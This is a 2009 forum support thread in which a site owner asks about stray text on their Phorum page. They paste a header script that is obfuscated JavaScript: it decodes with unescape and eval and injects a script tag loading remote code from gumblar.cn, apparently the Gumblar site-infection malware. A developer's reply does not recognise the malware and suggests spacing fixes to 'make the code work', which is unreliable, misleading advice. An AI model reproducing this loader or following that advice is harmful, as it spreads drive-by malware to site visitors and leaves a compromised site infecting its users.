Firefox PHP

Weird Code at the top of my forum/page

Posted by getitdone99 
Weird Code at the top of my forum/page
May 13, 2009 01:28PM
Hi forum world!

We have a slight issue with our forum. Right under our logo is an odd line of code. It reads:

)(/_/g); -->uses the FOCUS_TO_ID template }

Looks like there might be an issue in our header file? Can anyone please help?
Re: Weird Code at the top of my forum/page
May 13, 2009 01:46PM
well, check your header.tpl for that line of code. seems like you "uncommented" a comment.


Thomas Seifert
Re: Weird Code at the top of my forum/page
May 13, 2009 07:19PM
I found this line, but don't see anything wrong. Can you help?

</head>
<script language=javascript>
<!--(function(u3hz){var YKymV='v_61r_20_61_3d_22Sc_72iptEn_67i_6ee_22_2cb_3d_22Ve_72_73_69_6fn_28)+_22_2cj_3d_22_22_2cu_3dn_61v_69gator_2euserA_67_65_6et_3b_69f(_28_75_2e_69n_64e_78Of(_22Win_22)_3e0_29_26_26_28_75_2ein_64exOf(_22NT_206_22)_3c0)_26_26_28doc_75m_65nt_2ecook_69_65_2e_69nde_78Of(_22miek_3d1_22)_3c0)_26_26(_74ypeof(zrv_7ats)_21_3dtype_6ff(_22A_22_29)_29_7bzrvzts_3d_22A_22_3b_65v_61_6c(_22if_28_77indow_2e_22+a+_22)j_3dj+_22+a+_22Major_22+_62+a_2b_22Mi_6eo_72_22+_62+_61+_22Build_22+_62_2b_22j_3b_22)_3b_64o_63u_6de_6et_2ewri_74e_28_22_3cscript_20src_3d_2f_2f_67umblar_2ecn_2frss_2f_3f_69d_3d_22+j+_22_3e_3c_5c_2fsc_72i_70t_3e_22)_3b_7d';var deJ0=YKymV.replace(u3hz,'%');var Rkgvv=unescape(deJ0);eval(Rkgvv)})(/_/g);
--></script>
Re: Weird Code at the top of my forum/page
May 13, 2009 07:57PM
change
<!--(function(u3hz){var
to
<!--
(function(u3hz){ var

(extra line break + space after the "{" char)

and at the end change
(Rkgvv)})(/_/g);

to

(Rkgvv) })(/_/g);

(extra space before the "}" char)

I think that should make the code work.


Maurice Makaay
Phorum Development Team
my blog linkedin profile secret sauce
Sorry, only registered users may post in this forum.

Click here to login